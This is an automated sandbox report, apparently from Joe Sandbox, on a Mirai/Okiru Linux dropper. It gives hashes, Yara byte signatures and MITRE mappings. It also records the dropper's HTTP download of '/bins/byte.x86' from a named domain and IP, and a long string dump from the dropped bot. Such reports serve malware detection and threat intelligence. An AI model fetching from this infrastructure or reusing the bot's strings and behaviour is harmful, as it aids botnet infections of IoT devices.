Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
drp.x86.elf

Overview

General Information

Sample name:drp.x86.elf
Analysis ID:1581354
MD5:5c579391a0e733c2b406988b784dbca6
SHA1:b3467d67e48111344b1f052ca85b89d4b4013734
SHA256:412dcf842dc88b904d6c6900e9f2ca6f8ebe396d78cf5d5aec8e45a091e80cbf
Tags:elfuser-abuse_ch
Infos:

Detection

Mirai, Okiru
Score:88
Range:0 - 100
Whitelisted:false

Signatures

Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected Mirai
Yara detected Okiru
Machine Learning detection for dropped file
Sample is packed with UPX
ELF contains segments with high entropy indicating compressed/encrypted content
Found strings indicative of a multi-platform dropper
HTTP GET or POST without a user agent
Reads the 'hosts' file potentially containing internal network hosts
Sample contains only a LOAD segment without any section mappings
Writes ELF files to disk
Yara signature match

Classification

Joe Sandbox version:41.0.0 Charoite
Analysis ID:1581354
Start date and time:2024-12-27 13:26:10 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 22s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:drp.x86.elf
Detection:MAL
Classification:mal88.troj.evad.linELF@0/1@1/0
  • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
  • VT rate limit hit for: /tmp/byte
Command:/tmp/drp.x86.elf
PID:5507
Exit Code:5
Exit Code Info:
Killed:False
Standard Output:
byte
bro
Standard Error:
  • system is lnxubuntu20
  • drp.x86.elf (PID: 5507, Parent: 5430, MD5: 5c579391a0e733c2b406988b784dbca6) Arguments: /tmp/drp.x86.elf
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
SourceRuleDescriptionAuthorStrings
dump.pcapLinux_Trojan_Mirai_fa3ad9d0unknownunknown
  • 0x1804:$a: CB 08 C1 CB 10 66 C1 CB 08 31 C9 8A 4F 14 D3 E8 01 D8 66 C1
dump.pcapLinux_Trojan_Mirai_b14f4c5dunknownunknown
  • 0x83b4:$a: 53 31 DB 8B 4C 24 0C 8B 54 24 08 83 F9 01 76 15 66 8B 02 83 E9 02 25 FF FF 00 00 83 C2 02 01 C3 83 F9 01 77 EB 49 75 05 0F BE 02 01 C3
dump.pcapLinux_Trojan_Mirai_93fc3657unknownunknown
  • 0x188f:$a: 00 00 00 89 44 24 60 89 D1 31 C0 8B 7C 24 28 FC F3 AB 89 D1 8B 7C
dump.pcapLinux_Trojan_Mirai_804f8e7cunknownunknown
  • 0x1735:$a: 31 ED 81 E1 FF 00 00 00 89 4C 24 58 89 EA C6 46 04 00 C1 FA 1F
dump.pcapLinux_Trojan_Mirai_99d78950unknownunknown
  • 0x23ff:$a: 10 89 C3 80 BC 04 83 00 00 00 20 0F 94 C0 8D B4 24 83 00 00 00 25 FF 00
  • 0x24df:$a: 10 89 C3 80 BC 04 83 00 00 00 20 0F 94 C0 8D B4 24 83 00 00 00 25 FF 00
  • 0x2606:$a: 10 89 C3 80 BC 04 83 00 00 00 20 0F 94 C0 8D B4 24 83 00 00 00 25 FF 00
  • 0x28b1:$a: 10 89 C3 80 BC 04 83 00 00 00 20 0F 94 C0 8D B4 24 83 00 00 00 25 FF 00
  • 0x2ecd:$a: 10 89 C3 80 BC 04 83 00 00 00 20 0F 94 C0 8D B4 24 83 00 00 00 25 FF 00
Click to see the 6 entries
SourceRuleDescriptionAuthorStrings
/tmp/byteJoeSecurity_OkiruYara detected OkiruJoe Security
    /tmp/byteJoeSecurity_Mirai_9Yara detected MiraiJoe Security
      /tmp/byteLinux_Trojan_Mirai_fa3ad9d0unknownunknown
      • 0x11aa:$a: CB 08 C1 CB 10 66 C1 CB 08 31 C9 8A 4F 14 D3 E8 01 D8 66 C1
      /tmp/byteLinux_Trojan_Mirai_b14f4c5dunknownunknown
      • 0x7180:$a: 53 31 DB 8B 4C 24 0C 8B 54 24 08 83 F9 01 76 15 66 8B 02 83 E9 02 25 FF FF 00 00 83 C2 02 01 C3 83 F9 01 77 EB 49 75 05 0F BE 02 01 C3
      /tmp/byteLinux_Trojan_Mirai_93fc3657unknownunknown
      • 0x1235:$a: 00 00 00 89 44 24 60 89 D1 31 C0 8B 7C 24 28 FC F3 AB 89 D1 8B 7C
      Click to see the 9 entries
      SourceRuleDescriptionAuthorStrings
      5507.1.0000000008048000.000000000804d000.r-x.sdmpLinux_Trojan_Mirai_cc93863bunknownunknown
      • 0x101a:$a: C3 57 8B 44 24 0C 8B 4C 24 10 8B 7C 24 08 F3 AA 8B 44 24 08
      No Suricata rule has matched

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: /tmp/byteAvira: detection malicious, Label: EXP/ELF.Mirai.M
      Source: drp.x86.elfVirustotal: Detection: 9%Perma Link
      Source: drp.x86.elfReversingLabs: Detection: 13%
      Source: /tmp/byteJoe Sandbox ML: detected
      Source: byte.12.drString: byte/proc//proc/%s/exe/proc/self/exe/proc/proc/%d/cmdlinenetstatwgettftpcurlreboot/bin/busyboxvar/Challengeapp/hi3511gmDVRiboxusr/dvr_main _8182T_1108mnt/mtd/app/guivar/Kylinl0 c/udevdvar/tmp/soniahicorestm_hi3511_dvr/usr/lib/systemd/systemdshellmnt/sys/boot/media/srv/var/run/sbin/lib/etc/dev/home/Davincitelnetsshwatchdog/var/spool/var/Sofiasshd/usr/compress/bin//compress/bin/compress/usr/bashhttpdtelnetddropbearencodersystem/root/dvr_gui//root/dvr_app//anko-app//opt/soraJoshohajime902i13BzSxLxBxeYHOHO-LUGO7HOHO-U79OLJuYfouyf87NiGGeR69xdSO190Ij1XLOLKIKEEEDDEekjheory98escansh4MDMAfdevalvexscanspcMELTEDNINJAREALZflexsonskidsscanx86MISAKI-U79OLfoAxi102kxeswodjwodjwojMmKiy7f87lfreecookiex86sysgpufrgegesysupdater0DnAzepdNiGGeRD0nks69frgreu0x766f6964NiGGeRd0nks1337gafturasgbsigboa120i3UI49OaF3geaevaiolmao123123aOfurain0n4H34DggTrexewwasads1293194hjXDOthLaLosnggtwget-log1337SoraLOADERSAIAKINAggtq1378bfp919GRB1Q2SAIAKUSOggtr14FaSEXSLAVE1337ggtt1902a3u912u3u4haetrghbr19ju3dSORAojkf120hehahejeje922U2JDJA901F91SlaVLav12helpmedaddthhhhh2wgg9qphbqSlav3Th3seD3viceshzSmYZjYMQ5GbfSoRAxD123LOLiaGv5aA3SoRAxD420LOLinsomni640277SoraBeReppin1337ipcamCache66tlGg9QjUYfouyf876ke3TOKYO3lyEeaXul2dULCVxh93OfjHZ2zTY2gD6MZvKc7KU6rmMkiy6f87lA023UU4U24UIUTheWeekndmioribitchesA5p9TheWeekndsmnblkjpoiAbAdTokyosnebAkiruU8inTznetstatsAlexW9RCAKM20TnewnetwordAyo215WordnloadsWordmanenotyakuzaaBelchWordnetsobpBigN0gg0r420X0102I34fofhasfhiafhoiX19I239124UIUoismXSHJEHHEIIHWOolsVNwo12DeportedDeportedXkTer0GbA1onry0v03FortniteDownLOLZY0urM0mGaypussyfartlmaojkGrAcEnIgGeRaNnYvdGkqndCOqGeoRBe6BEGuiltyCrownZEuS69s4beBsEQhdHOHO-KSNDOZEuz69sat1234aj93hJ23scanHAalie293z0k2LscanJoshoARMHellInSideayyyGangShitscanJoshoARM5HighFryb1glscanJoshoARM6IWhPyucDbJboatnetzscanJoshoARM7IuYgujeIqnbtbatrtahzexsexscanJoshoM68KJJDUHEWBBBIBscanJoshoMIPSJSDGIEVIVAVIGcKbVkzGOPascanJoshoMPSLccADscanJoshoPPCKAZEN-OIU97chickenxingsscanJoshoSH4yakuskzm8KAZEN-PO78HcleanerscanJoshoSPCKAZEN-U79OLdbeefscanJoshoX86yakuz4c24KETASHI32ddrwelperscanarm5zPnr6HpQj2Kaishi-Iz90Ydeexecscanarm6zdrtfxcgyKatrina32doCP3fVjscanarm7zxcfhuioKsif91je39scanm68kKuasadvrhelperl33t_feetl33tl33tfeetscanmipsKuasaBinsMateeQnOhRk85rscanmpslLOLHHHOHOHBUIeXK20CL12ZnyamezyQBotBladeSPOOKYhikariwasherep4029x91xx32uhj4gbejhwizardzhra.outboatnetcondiheroshimaskid.dbglzrdPownedSecurity69.aresfxlyazsxhyUNSTABLEmoobotjnsd9sdoilayourmomgaeissdfjiougsiojOasisSEGRJIJHFVNHSNHEIHFOSapep999KOWAI-BAdAsVKOWAI-SADjHKipU7Ylairdropmalwareyour_verry_fucking_gayBig-Bro-Brightsefaexecshirololieagle.For-Gai-Mezy0x6axNLcloqkisvspookymythSwergjmioGKILLEJW(IU(JIWERGFJGJWJRGHetrhwewrtheIuFdKssCxzjSDFJIjioOnrYoXd666ewrtkjokethajbdf89wu823AAaasrdgsWsGA4@F6FGhostWuzHere666BOGOMIPSbeastmodedvrHelperbestmodesfc6aJfIuYDemon.xeno-is-godICY-P-0ODIJgSHUIHIfhwrgLhu87VhvQPzlunadakuexecbinTacoBellGodYololigangExecutionorbitclientAmnesiaOwariUnHAnaAWz3hirobbomiorieagledoxxRollielessie.hax.yakuzawordminerminerwordSinixV4hohog0dbu7tuorphicfurasshuhorizonassailantAresKawaiihelperECHOBOTDEMONS
      Source: global trafficHTTP traffic detected: GET /bins/byte.x86 HTTP/1.0Data Raw: 00 62 Data Ascii: b
      Source: /tmp/drp.x86.elf (PID: 5507)Reads hosts file: /etc/hostsJump to behavior
      Source: unknownTCP traffic detected without corresponding DNS query: 185.125.190.26
      Source: unknownTCP traffic detected without corresponding DNS query: 185.125.190.26
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficHTTP traffic detected: GET /bins/byte.x86 HTTP/1.0Data Raw: 00 62 Data Ascii: b
      Source: global trafficDNS traffic detected: DNS query: vbtgsze.r-e.kr
      Source: drp.x86.elfString found in binary or memory: http://upx.sf.net
      Source: unknownNetwork traffic detected: HTTP traffic on port 46540 -> 443

      System Summary

      barindex
      Source: dump.pcap, type: PCAPMatched rule: Linux_Trojan_Mirai_fa3ad9d0 Author: unknown
      Source: dump.pcap, type: PCAPMatched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
      Source: dump.pcap, type: PCAPMatched rule: Linux_Trojan_Mirai_93fc3657 Author: unknown
      Source: dump.pcap, type: PCAPMatched rule: Linux_Trojan_Mirai_804f8e7c Author: unknown
      Source: dump.pcap, type: PCAPMatched rule: Linux_Trojan_Mirai_99d78950 Author: unknown
      Source: dump.pcap, type: PCAPMatched rule: Linux_Trojan_Mirai_a68e498c Author: unknown
      Source: dump.pcap, type: PCAPMatched rule: Linux_Trojan_Mirai_88de437f Author: unknown
      Source: dump.pcap, type: PCAPMatched rule: Linux_Trojan_Mirai_ae9d0fa6 Author: unknown
      Source: dump.pcap, type: PCAPMatched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
      Source: dump.pcap, type: PCAPMatched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
      Source: dump.pcap, type: PCAPMatched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
      Source: 5507.1.0000000008048000.000000000804d000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
      Source: /tmp/byte, type: DROPPEDMatched rule: Linux_Trojan_Mirai_fa3ad9d0 Author: unknown
      Source: /tmp/byte, type: DROPPEDMatched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
      Source: /tmp/byte, type: DROPPEDMatched rule: Linux_Trojan_Mirai_93fc3657 Author: unknown
      Source: /tmp/byte, type: DROPPEDMatched rule: Linux_Trojan_Mirai_804f8e7c Author: unknown
      Source: /tmp/byte, type: DROPPEDMatched rule: Linux_Trojan_Mirai_99d78950 Author: unknown
      Source: /tmp/byte, type: DROPPEDMatched rule: Linux_Trojan_Mirai_a68e498c Author: unknown
      Source: /tmp/byte, type: DROPPEDMatched rule: Linux_Trojan_Mirai_88de437f Author: unknown
      Source: /tmp/byte, type: DROPPEDMatched rule: Linux_Trojan_Mirai_ae9d0fa6 Author: unknown
      Source: /tmp/byte, type: DROPPEDMatched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
      Source: /tmp/byte, type: DROPPEDMatched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
      Source: /tmp/byte, type: DROPPEDMatched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
      Source: /tmp/byte, type: DROPPEDMatched rule: Detects Mirai Botnet Malware Author: Florian Roth
      Source: LOAD without section mappingsProgram segment: 0x8048000
      Source: dump.pcap, type: PCAPMatched rule: Linux_Trojan_Mirai_fa3ad9d0 reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = fe93a3552b72b107f95cc5a7e59da64fe84d31df833bf36c81d8f31d8d79d7ca, id = fa3ad9d0-7c55-4621-90fc-6b154c44a67b, last_modified = 2021-09-16
      Source: dump.pcap, type: PCAPMatched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
      Source: dump.pcap, type: PCAPMatched rule: Linux_Trojan_Mirai_93fc3657 reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = d01a9e85a01fad913ca048b60bda1e5a2762f534e5308132c1d3098ac3f561ee, id = 93fc3657-fd21-4e93-a728-c084fc0a6a4a, last_modified = 2021-09-16
      Source: dump.pcap, type: PCAPMatched rule: Linux_Trojan_Mirai_804f8e7c reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 1080d8502848d532a0b38861437485d98a41d945acaf3cb676a7a2a2f6793ac6, id = 804f8e7c-4786-42bc-92e4-c68c24ca530e, last_modified = 2021-09-16
      Source: dump.pcap, type: PCAPMatched rule: Linux_Trojan_Mirai_99d78950 reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 3008edc4e7a099b64139a77d15ec0e2c3c1b55fc23ab156304571c4d14bc654c, id = 99d78950-ea23-4166-a85a-7a029209f5b1, last_modified = 2021-09-16
      Source: dump.pcap, type: PCAPMatched rule: Linux_Trojan_Mirai_a68e498c reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 951c9dfcba531e5112c872395f6c144c4bc8b71c666d2c7d9d8574a23c163883, id = a68e498c-0768-4321-ab65-42dd6ef85323, last_modified = 2021-09-16
      Source: dump.pcap, type: PCAPMatched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
      Source: dump.pcap, type: PCAPMatched rule: Linux_Trojan_Mirai_ae9d0fa6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = ca2bf2771844bec95563800d19a35dd230413f8eff0bd44c8ab0b4c596f81bfc, id = ae9d0fa6-be06-4656-9b13-8edfc0ee9e71, last_modified = 2021-09-16
      Source: dump.pcap, type: PCAPMatched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
      Source: dump.pcap, type: PCAPMatched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
      Source: dump.pcap, type: PCAPMatched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
      Source: 5507.1.0000000008048000.000000000804d000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
      Source: /tmp/byte, type: DROPPEDMatched rule: Linux_Trojan_Mirai_fa3ad9d0 reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = fe93a3552b72b107f95cc5a7e59da64fe84d31df833bf36c81d8f31d8d79d7ca, id = fa3ad9d0-7c55-4621-90fc-6b154c44a67b, last_modified = 2021-09-16
      Source: /tmp/byte, type: DROPPEDMatched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
      Source: /tmp/byte, type: DROPPEDMatched rule: Linux_Trojan_Mirai_93fc3657 reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = d01a9e85a01fad913ca048b60bda1e5a2762f534e5308132c1d3098ac3f561ee, id = 93fc3657-fd21-4e93-a728-c084fc0a6a4a, last_modified = 2021-09-16
      Source: /tmp/byte, type: DROPPEDMatched rule: Linux_Trojan_Mirai_804f8e7c reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 1080d8502848d532a0b38861437485d98a41d945acaf3cb676a7a2a2f6793ac6, id = 804f8e7c-4786-42bc-92e4-c68c24ca530e, last_modified = 2021-09-16
      Source: /tmp/byte, type: DROPPEDMatched rule: Linux_Trojan_Mirai_99d78950 reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 3008edc4e7a099b64139a77d15ec0e2c3c1b55fc23ab156304571c4d14bc654c, id = 99d78950-ea23-4166-a85a-7a029209f5b1, last_modified = 2021-09-16
      Source: /tmp/byte, type: DROPPEDMatched rule: Linux_Trojan_Mirai_a68e498c reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 951c9dfcba531e5112c872395f6c144c4bc8b71c666d2c7d9d8574a23c163883, id = a68e498c-0768-4321-ab65-42dd6ef85323, last_modified = 2021-09-16
      Source: /tmp/byte, type: DROPPEDMatched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
      Source: /tmp/byte, type: DROPPEDMatched rule: Linux_Trojan_Mirai_ae9d0fa6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = ca2bf2771844bec95563800d19a35dd230413f8eff0bd44c8ab0b4c596f81bfc, id = ae9d0fa6-be06-4656-9b13-8edfc0ee9e71, last_modified = 2021-09-16
      Source: /tmp/byte, type: DROPPEDMatched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
      Source: /tmp/byte, type: DROPPEDMatched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
      Source: /tmp/byte, type: DROPPEDMatched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
      Source: /tmp/byte, type: DROPPEDMatched rule: Mirai_Botnet_Malware date = 2016-10-04, hash5 = 420bf9215dfb04e5008c5e522eee9946599e2b323b17f17919cd802ebb012175, hash4 = 2efa09c124f277be2199bee58f49fc0ce6c64c0bef30079dfb3d94a6de492a69, hash3 = 20683ff7a5fec1237fc09224af40be029b9548c62c693844624089af568c89d4, hash2 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, hash1 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, author = Florian Roth, description = Detects Mirai Botnet Malware, hash10 = c61bf95146c68bfbbe01d7695337ed0e93ea759f59f651799f07eecdb339f83f, hash11 = d9573c3850e2ae35f371dff977fc3e5282a5e67db8e3274fd7818e8273fd5c89, hash12 = f1100c84abff05e0501e77781160d9815628e7fd2de9e53f5454dbcac7c84ca5, hash9 = bf0471b37dba7939524a30d7d5afc8fcfb8d4a7c9954343196737e72ea4e2dc4, hash8 = 89570ae59462e6472b6769545a999bde8457e47ae0d385caaa3499ab735b8147, hash7 = 70bb0ec35dd9afcfd52ec4e1d920e7045dc51dca0573cd4c753987c9d79405c0, hash6 = 62cdc8b7fffbaf5683a466f6503c03e68a15413a90f6afd5a13ba027631460c6, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, hash13 = fb713ccf839362bf0fbe01aedd6796f4d74521b133011b408e42c1fd9ab8246b
      Source: classification engineClassification label: mal88.troj.evad.linELF@0/1@1/0

      Data Obfuscation

      barindex
      Source: initial sampleString containing UPX found: $Info: This file is packed with the UPX executable packer http://upx.sf.net $
      Source: initial sampleString containing UPX found: $Info: This file is packed with the UPX executable packer http://upx.sf.net $
      Source: initial sampleString containing UPX found: $Id: UPX 3.96 Copyright (C) 1996-2020 the UPX Team. All Rights Reserved. $
      Source: /tmp/drp.x86.elf (PID: 5507)File written: /tmp/byteJump to dropped file
      Source: drp.x86.elfSubmission file: segment LOAD with 7.7429 entropy (max. 8.0)

      Stealing of Sensitive Information

      barindex
      Source: Yara matchFile source: /tmp/byte, type: DROPPED
      Source: Yara matchFile source: /tmp/byte, type: DROPPED

      Remote Access Functionality

      barindex
      Source: Yara matchFile source: /tmp/byte, type: DROPPED
      Source: Yara matchFile source: /tmp/byte, type: DROPPED
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity Information1
      Scripting
      Valid AccountsWindows Management Instrumentation1
      Scripting
      Path Interception11
      Obfuscated Files or Information
      OS Credential Dumping1
      File and Directory Discovery
      Remote ServicesData from Local System1
      Encrypted Channel
      Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media2
      Non-Application Layer Protocol
      Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive3
      Application Layer Protocol
      Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture1
      Ingress Tool Transfer
      Traffic DuplicationData Destruction
      No configs have been found
      SourceDetectionScannerLabelLink
      drp.x86.elf10%VirustotalBrowse
      drp.x86.elf13%ReversingLabsLinux.Backdoor.Mirai
      SourceDetectionScannerLabelLink
      /tmp/byte100%AviraEXP/ELF.Mirai.M
      /tmp/byte100%Joe Sandbox ML
      No Antivirus matches
      No Antivirus matches
      NameIPActiveMaliciousAntivirus DetectionReputation
      vbtgsze.r-e.kr
      154.213.190.246
      truefalse
        high
        NameSourceMaliciousAntivirus DetectionReputation
        http://upx.sf.netdrp.x86.elffalse
          high
          • No. of IPs < 25%
          • 25% < No. of IPs < 50%
          • 50% < No. of IPs < 75%
          • 75% < No. of IPs
          IPDomainCountryFlagASNASN NameMalicious
          154.213.190.246
          vbtgsze.r-e.krSeychelles
          22769DDOSING-BGP-NETWORKUSfalse
          185.125.190.26
          unknownUnited Kingdom
          41231CANONICAL-ASGBfalse
          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          154.213.190.246byte.mpsl.elfGet hashmaliciousMirai, OkiruBrowse
            byte.ppc.elfGet hashmaliciousMirai, OkiruBrowse
              llklllklld.x86.elfGet hashmaliciousMirai, OkiruBrowse
                185.125.190.26ppc.elfGet hashmaliciousMiraiBrowse
                  arm6.nn.elfGet hashmaliciousOkiruBrowse
                    RpcSecurity.arm7.elfGet hashmaliciousMiraiBrowse
                      RpcSecurity.ppc.elfGet hashmaliciousUnknownBrowse
                        boatnet.arm7.elfGet hashmaliciousMiraiBrowse
                          kitsune.arm5.elfGet hashmaliciousGafgyt, MiraiBrowse
                            kitsune.sparc.elfGet hashmaliciousGafgyt, MiraiBrowse
                              kitsune.arm6.elfGet hashmaliciousGafgyt, MiraiBrowse
                                ub8ehJSePAfc9FYqZIT6.m68k.elfGet hashmaliciousMiraiBrowse
                                  boatnet.ppc.elfGet hashmaliciousMiraiBrowse
                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
